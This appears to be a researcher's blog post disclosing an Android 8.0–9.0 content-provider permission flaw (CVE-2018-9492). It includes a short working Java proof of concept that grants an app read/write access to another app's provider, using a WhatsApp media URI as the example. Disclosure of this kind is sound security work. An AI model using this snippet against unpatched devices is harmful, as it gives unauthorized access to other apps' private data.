Global grant uri in Android 8.0-9.0 (2018 year)

Any thirdparty application was able to grant read/write access to any exported/non exported, secured by permissions content providers which were installed in system. It did't matter if content provider defined in AndroidManifest with grantUriPermission flag or not, if it was exported or no. Thirdparty were able to access any content provider in system without user interaction.

Uri uri =Uri.parse("content://com.whatsapp.provider.media/item/5");
Intent intent = new Intent(Intent.ACTION_MAIN);
intent.setClassName(getPackageName(), MainActivity.class.getName());
intent.addFlags(Intent.FLAG_GRANT_WRITE_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_READ_URI_PERMISSION);
intent.addFlags(Intent.FLAG_GRANT_PERSISTABLE_URI_PERMISSION);
intent.putExtra(Intent.EXTRA_STREAM, uri);
intent.setType("*/*");
startActivity(intent);

And that's all :) When you launch that code on vulnerable Android your app receives access to passed "uri" value. You can opened any content providers in system!

PoC demo:


This funny bug was reported in 30.08.2018. 
And than
The Android Security Team believes that this is a duplicate of a report previously submitted by another external researcher on July 26, 2018.

So, for me it was duplicate.
Original bug information is next:

  • CVE-2018-9492
  • Author: Michał Bednarski 

Popular posts from this blog

Facebook Messenger server random memory exposure through corrupted GIF image

Homograph attack on domains with K